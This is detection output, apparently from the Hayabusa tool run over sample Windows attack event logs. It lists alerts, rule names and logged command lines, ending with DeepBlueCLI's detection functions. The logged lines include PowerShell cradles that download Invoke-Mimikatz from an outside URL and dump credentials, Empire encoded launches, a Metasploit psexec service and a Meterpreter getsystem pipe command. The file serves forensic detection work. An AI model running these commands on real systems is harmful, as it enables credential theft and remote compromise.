Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:58.267 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:58.267 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:33:13.923 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:33:13.923 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:41:27.017 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 
0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:41:27.017 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:45:16.455 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,high,,PowerShell Web Download and 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 19:15:32.581 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:49.846 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.753 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.785 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.847 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 
0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:22.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.543 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.575 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.637 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 
+2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,,Base64 Encoded Command Line Param Indicator,,rules/sigma/process_creation_builtin/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.918 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:19.153 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:19.153 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 03:40:37.088 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:40:41.865 +00:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: 
%SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 
+2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2017-06-09 19:21:26.968 +00:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-12 23:39:43.512 +00:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-30 16:31:49.876 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:49.908 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:05.661 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:07.371 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.803 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.803 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.804 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } 